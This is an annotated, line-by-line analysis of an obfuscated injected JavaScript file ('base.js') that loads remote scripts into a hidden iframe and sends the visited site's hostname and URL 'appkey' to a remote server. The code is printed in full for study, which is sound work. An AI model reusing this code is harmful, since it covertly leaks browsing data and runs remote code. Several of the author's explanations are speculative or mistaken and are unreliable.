The Mysterious Script

1. (function() {
2.     try {
3.         top.tlbscdr = {}; // Instantiates tlbscdr property on the top (window) object. If you don't know what top means, look here: https://www.w3schools.com/Jsref/prop_win_top.asp
4.         top.tlbscdr.jscdr = []; // Creates another property in top.tlbscdr with an empty array as its value.
5.         var d = new Date; // Current date.
6.         top.tlbscdr.jscdr.push({
7.             jsname: "base.js",
8.             jsexetype: "1",
9.             btime: d
10.         }); // Inserts into top.tlbscdr.jscdr this object.
11.         // l is a function. notice that it starts with "var" which could mean this function should only be isolated on this entire javascript block.
12.         var l = function() {
13.                 // In here, top.tlbs is declared nowhere. Nobody knows what top.tlbs is used for. Nobody even knows how will the code get here.
14.                 // By default, this function will return `undefined`
15.                 if (top.tlbs && !top.tlbsEmbed) {
16.                     top.tlbsEmbed = !0; // "top.tlbsEmbed = (bool) true". Clever.
17.  
18.                     /**
19.                      * while "b" might have been declared somewhere and can still be accessed from here, "b" is overridden. Why it is explicit that it calls "top.document" and at the end is calling the first occurrence of <head> tag is interesting.
20.                      *
21.                      * A feasible explanation would be one in w3schools as linked earlier. If this script is called from an iframe, calling "top" from inside the iframe will give you revealing details where the page is loaded from. So are they collecting data?
22.                      *
23.                      * Remember that "a" was a query string built in the function before this? strange to override it with this (top.tlbs.iframejs.split("|")). The aforementioned function is splitting the values of top.tlbs.iframejs into an array and assigning it to variable "a"
24.                      *
25.                      * Variable "c" is easily a string declaring the starting tags of html, head and meta. Accessible outside scope. Variable "g" is the real start of the iterator here and strangely accessible from outside.
26.                      *
27.                      * Again,nobody knows what is in top.tlbs.iframejs ("a"), so it loops based on that length and increments.
28.                      *
29.                      */
30.                     for (var b = top.document.getElementsByTagName("head")[0], a = top.tlbs.iframejs.split("|"), c = '<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />', g = 0; g < a.length; g++)
31.                         /**
32.                          * We can not assume what is in top.tlbs.iframejs here. It sees to look something like this:
33.                          *
34.                          * "https://google.com/jquery.js|https://bootstrap.com/bootstrap.js|https://react.com/react.js"
35.                          *
36.                          * Strange that it checks for array keys that it should only run the condition block if they key is not equal to -1. Anyway, this is blurry to me but what is clear is that it is loading its own javascript from a list of .js files as explained on an earlier line
37.                          * What these js files are being loaded is beyond me.
38.                          */
39.                         if (-1 != a[g].indexOf(".js")) c += '<script src="' + a[g] + '" defer charset="UTF-8">\x3c/script>';
40.                         else if (-1 != a[g].indexOf(".css")) {
41.                           /**
42.                            * To attribute malice on this code is not fair. For some reason, it is also loading stylesheets. But why?
43.                            */
44.                         var e =
45.                             document.createElement("link");
46.                         e.rel = "stylesheet";
47.                         e.type = "text/css";
48.                         e.charset = "UTF-8";
49.                         e.href = a[g];
50.                         b.appendChild(e) // Appends the stylesheet built into the head tag.
51.                     }
52.                     c += "</head></html>"; // Closes the HTML.
53.                     a = document.createElement("iframe"); // Creates an empty iframe object
54.                     a.style.display = "none"; // the iframe is hidden? now that's malicious.
55.                     document.body.appendChild(a); //the empty iframe constructed earlier is maliciously appended to the document you just loaded.
56.                     try {
57.                         // Maliciously writes the built HTML into the iframe.
58.                         var d = a.contentWindow.document;
59.                         d.write(c);
60.                         d.close() // why would it close itself?
61.                     } catch (h) {
62.                         // because there can be incompatibilities when dealing with iframes on older browsers, this is a way to narrow down IE users. It checks if the current page is equal to www.people.com.cn or www.caijing.com.cn
63.                         if (/MSIE/g.test(navigator.userAgent) && (0 <= location.href.indexOf("www.people.com.cn") || 0 <= location.href.indexOf("www.caijing.com.cn"))) return;
64.                         /**
65.                          * This one right here is ass-holish in nature. This is the equivalent of accessing say, facebook.com/dogsareawesome and forcing you a redirect to facebook.com/. Then when you get there, the entire page is wiped and is replaced by the html
66.                          * document you just created earlier using the "c" tvariable.
67.                          *  */
68.                         a.src = "javascript:void((function(){document.open();document.domain='" + document.domain +
69.                             "';document.write('" + c + "');document.close()})())"
70.                     }
71.                     // Gonna createa new style
72.                     c = document.createElement("style");
73.                     c.type = "text/css";
74.                     // These are angular elements being passed here. Nobody knows why.
75.                     c.innerHTML = '@charset "UTF-8";[ng\\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\\:form{display:block;}';
76.                     // Gonna append that style.
77.                     b.appendChild(c)
78.                 } else top.nobar = !0 // The variable top.nobar is not used anywhere. To assign false into it is mysterious. Probably used by one the javascript files loaded.
79.             },
80.             // declares a function called n. Ends the var declaration block from line 12. similar to the declaration of variable l, this function is intended to only reside on this javascript block.
81.             // This function is used later and the argument passed is an empty script DOM object.
82.             n = function(b) {
83.                 // Pardon but I'm a bit hazy here so I'm gonna guess. What this means to say is when the script is "ready", do the next lines. If you do jQuery, something along the lines of $(document).ready() except that we're referring to this new script object rather the the document.
84.                 b.readyState ? b.onreadystatechange = function() {
85.                     if ("loaded" == b.readyState || "complete" == b.readyState) b.onreadystatechange = null, l()
86.                 } : b.onload = function() { // This is the other half of the ternary operator (?) earlier. Regardless where you fall, it means to run the function l();
87.                     l()
88.                 }
89.  
90.                 // As mentioned earlier, this function just tells the script object to run the function l();
91.             };
92.         // No idea why it would compare parent (window) and self (window). However, context of self may have changed within this function.
93.         parent ==
94.             self && function() {
95.               /**
96.                * Initialize document as "b" with limited scope, get an element in the document with an ID #1qa2ws and stores it on variable "a" which is uncertain how it knows to call #1qa2ws.
97.                * Instantiates variable "c" and assigns the value of "src" attribute from a.
98.                *
99.                * Variable "d" is the <head> tag of a document. It first checks for the "head" property (document.head) in "document" and assigns it. Else, it gets the <head> tag by explicitly (getElementsByTagName) looking for a <head> tag
100.                * Variable "a" is self-assigning the attributes of #1qa2ws. Variable "e" contains the number of attributes #1qa2ws has.
101.                * "f" is blank (""), "h" is 0
102.                *
103.                * Note that the aforementioned variables a, c, d, e, f and h are declared to be reacheable on a larger scope (outside this)
104.                *
105.                * This for loop will continually run as long as h is less than e, the number of attributes #1qa2ws has and will increment accordingly.
106.                *
107.                * The line /^(src|type|id)$/.test(a[h].name) means to continually search in the attributes for values "src", "type" and "id". If it returns true, it will execute the section after the double pipes (||). Very clever, you learn something new everyday.
108.                *
109.                * The code after it makes it clear what it's trying to do: get all of the attributes of #1qa2ws and put the values of src, id and type into a query string.
110.                *
111.                * If the attributes are familiar to you, we can make the following element and make an example out of this:
112.                *  <source id="1qa2ws" type="audio/ogg" src="beef.ogg" />
113.                *  <source id="1qa2ws" type="audio/wav" src="brisket.wav" />
114.                *
115.                * Which, if the code in the for line is run, will yield the variable f to be:
116.                *  "&id=1qa2ws&type=audio/ogg&src=beef.ogg&id=1qa2ws&type=audio/ogg&src=beef.ogg"
117.                *
118.                * It is unclear why the script would loop on multiple instances of #1qa2ws, which is a highly frowned coding practice.
119.                * The fact that it's calling "getElementById" does not make sense that it loops on multiple instances of #1qa2ws because "getElementById" is not plural.
120.                */
121.                 for (var b = document, a = b.getElementById("1qa2ws"), c = a.getAttribute("src"), d = b.head || b.getElementsByTagName("head")[0], a = a.attributes, e = a.length, f = "", h = 0; h < e; h++) /^(src|type|id)$/.test(a[h].name) || (f = f + "&" + a[h].name + "=" + a[h].value);
122.                 a = f; // Done looping through "multiple" #1qa2ws. We are discarding "a" and assigning the query string made earlier.
123.                 s = b.createElement("script"); // Declaring a variable called s and creating a script object from document (b). Notice that this is also intended to be accessed outside scope.
124.                 n(s); // Calls the "n" function that accepts a parameter.
125.                 top.apptlbs = {};
126.                 s.charset = "UTF-8";
127.                 b = (new Date).getTime(); // b is discarded again for a new date/time obejct.
128.                 c = c.split("www/")[0]; // Strange why it's splitting c and looking for a www/. At this state, "c" is just a lowly style object.
129.                 // This is building a url on the current window you are at. If you are on say, facebook.com, then e becomes facebook.com. If you're on say, localhost:8000, then this becomes localhost:8000
130.                 e = top.window.location ? top.window.location.hostname + (top.window.location.port ? ":" + top.window.location.port : "") : "";
131.                 // Remember that "s" is still a script object and contains an src loaded somewhere. So it is modifying the src at this point, changing it to the url found in "c", passing get values and strings.
132.                 s.src = c + "get?time=" + b + "&tlbsip=" +
133.                     c + "&website=" + e + encodeURI(a);
134.  
135.                 /**
136.                  * For example, if e is facebook.com, and you're on your localhost:8000 page, and using the example on the variable a earlier, then s.src will look like this:
137.                  *
138.                  * facebook.com/get/?time=1553944877510&btlbsip=facebook.com&website=localhost:8000&id=1qa2ws&type=audio/ogg&src=beef.ogg&id=1qa2ws&type=audio/ogg&src=beef.ogg
139.                  *
140.                  * Which means that it is possibly collecting information about pages you visit.
141.                  */
142.                 var k;
143.                 a: {
144.                     try {
145.                       // this is looking for the value of appkey in the URL you are at.
146.                         var l = top.window.location.search.substr(1).match(/(^|&)appkey=([^&]*)(&|$)/i);
147.                         // If it cannot find appkey in your url, then it will try the second instance;
148.                         if (null != l) {
149.                             k = unescape(l[2]); // basically handles special characters.
150.                             break a // stops the rest of this object (think ending a function)
151.                         }
152.                         k = "";
153.                         break a
154.                     } catch (m) {}
155.                     k = void 0
156.                 }
157.                 /**
158.                  * Whether k is successful or not, it is not known if the statement below is fully executed.
159.                  * The statement is structured in a ladderized manner, on 3 sections. At the very last part, the URL is built finally, and the script tag is inserted into the header of your page.
160.                  */
161.                 k && "http://" + e + "/" == c && (s.src = s.src + "&appkey=" + k, top.apptlbs.appkey = k);
162.                 d.appendChild(s)
163.             }();
164.         /**
165.          * Nobody really knows why it keeps on invoking a date objejct. We can assume 2 things:
166.          *    - it is benchmarking the entire process
167.          *    - logging the time you were on this page (very likely)
168.          */
169.         d = new Date;
170.         top.tlbscdr.jscdr.push({
171.             jsname: "base.js",
172.             jsexetype: "2",
173.             btime: d
174.         })
175.     } catch (m) {
176.       /**
177.        * Well in some way, the try statement failed. So let's look again here:
178.        */
179.         document.getElementById("1qa2ws").getAttribute("src"); // It assumes that you have an element with an ID #1qa2ws and gets the src attribute of it.
180.         var d = m.message, // Strange that it is logging the exception it received.
181.             d = d + ("&time=" + (new Date).getTime()), // Gets the time (again)
182.             f = document.createElement("script"); // instantiates a new script object again.
183.         f.onload = f.onreadystatechange = function() { // "Execute me if the page is loaded"
184.             this.readyState && "loaded" !== this.readyState && "complete" !== this.readyState || (f.onload = f.onreadystatechange = null, document.body.removeChild(f))
185.  
186.             // No idea why it would build a script element and just remove it later. This section feels incomplete.
187.         }
188.     }
189. })(window);